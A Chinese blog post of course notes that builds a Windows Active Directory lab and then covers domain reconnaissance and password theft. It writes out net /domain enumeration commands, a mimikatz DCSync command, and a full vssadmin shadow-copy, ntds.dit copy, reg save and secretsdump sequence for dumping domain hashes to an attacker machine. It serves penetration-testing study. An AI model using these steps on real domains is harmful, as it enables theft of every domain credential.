网络安全
域环境搭建

本篇整理自我的语雀学习笔记(课堂学习与实操记录),已转为纯文字版并按博客格式排版。
系统镜像安装
windows 7
windows 2008
windows 2012
用户名设置为 administrator ,节省手动激活 administrator 的时间 (windows 默认禁用 administrator)
安装vmtools
之前老版本的vmtools
安装AD (windows server 2012 )
1 配置静态 ip (成为域控必须配置静态IP)
2 重命名计算机 (可选, 默认hostname是随机名)
3 安装ad
提升机器为域控 (windows server 2012)
点击“将此服务器提升为域控制器”
设置任意域名
一个windows server 从普通的机器工作组环境变成域控时,用户发生了什么变化:
- 安装域环境前的工作组管理员用户: administrator
- 安装域环境后的域用户: 域名\administrator
从工作组管理员变成了域管理员,密码未发生改变
成员主机加入域
windows 7
1 配置静态ip(dns地址需要有一个是 域控的ip)
2 修改主机名
3 加入域环境
输入域控机器的用户名和密码
windows server 2008
1 配置静态ip
2 改主机名
3 加入域环境
成员主机入域后,用户发生了什么变化
系统原有的工作组用户,无变化,成员入域后依然可以登录到本地的工作组 主机名\用户名 ,如 PC1-windows7\administrator 简写 .\administrator
成员主机也可以登录域用户 域名\用户名 ,如 baidu.com\administrator
域环境基础操作
computers 容器
保存了成员主机的信息
user 容器
新建一个普通的域用户
用户名:user01
密码:1qaz@WSX
普通域用户,成员主机可以登录
新建一个域管理员用户
用户名:admin01
密码:1qaz@WSX3edc
域环境信息收集
判断是否是域环境
用户名判断 : 域名\用户名
ipconfig /all 判断:域环境会直接看到域名
用户信息
查看域用户
net user /domain
查看域用户组
net group /domain
查看成员主机
net group "domain computers" /domain
查看域控
net group "domain controllers" /domain
查看域管理员用户
net group "domain admins" /domain
查看当前用户是否是域管理员 (是否在域管理员用户组中)
net user 用户名 /domain
定位域控
1 ping 域名 / nslookup 域名
2 dns 地址
不标准:域控和DNS服务在同一台主机中才行,而实际中,域控和 DNS是分开的,判断就会有误差
3 ldap 查询
nslookup _LDAP._TCP.dc._msdcs.域名
4 spn 查询
spn 服务主体名称,域环境中只有注册了spn的服务才会使用 kerberos 认证,否则会被降级为网络认证
spn 会有自己的名字,如 host 是 smb服务、 termsrv 是 rdp 服务
| 服务类型 (Service Class) | 对应功能/服务名称 | 典型用途 |
|---|---|---|
| HOST | 核心宿主服务 | 涵盖 SMB、注册表访问、受限委派等,是默认的“全能”SPN。 |
| TERMSRV | 远程桌面服务 (RDP) | 用于通过 Kerberos 验证的远程桌面连接。 |
| MSSQLSvc | Microsoft SQL Server | 数据库服务的 Kerberos 身份验证(需指定端口)。 |
| HTTP | Web 服务 / WinRM | 用于 IIS 网站、WS-Management (PowerShell Remoting) 或 SSRS。 |
| CIFS | 通用互联网文件系统 | 专门用于 SMB 共享(通常在 HOST 下已包含,但 NAS 设备常显式映射)。 |
| LDAP | 轻量级目录访问协议 | 域控制器上的目录服务。 |
| GC | 全局编录 (Global Catalog) | 域控跨域查询服务。 |
| DNS | 域名系统 | 域控提供的 DNS 解析服务。 |
| WSMAN | Windows 远程管理 | WinRM 服务的另一种表现形式。 |
| RestrictedKrbHost | 受限 Kerberos 宿主 | 用于不支持完全主机 SPN 的受限场景。 |
| ExchangeMDB | Exchange 数据库服务 | 企业邮箱 Exchange Server 相关服务。 |
| MAPSRVC | 微软安装程序服务 | 软件分发与管理。 |
域环境密码凭证获取
域管读取ntds.dit
前提:登录域管理员
C:\Windows\NTDS\ntds.dit
**lsadump::dcsync /all /csv**
dcsync 域控同步服务
域控读取ntds.dt
前提: 登录到域控
vss 服务:volume shadow copy service 卷影复制服务。用于windows备份、windows还原点
1 为域控的c盘创建一个副本(快照)
**vssadmin create shadow /for=c:**
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
2 从副本中把ntds.dit复制出来
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\ windows\ntds\ntds.dit C:\ntds.dit
3 导出为 system 文件
reg save HKLM\system C:\system
secretsdump.exe -system system -ntds ntds.dit LOCAL
4 把system文件和ntds.dit都传输到攻击机
你的赏识是我前进的动力

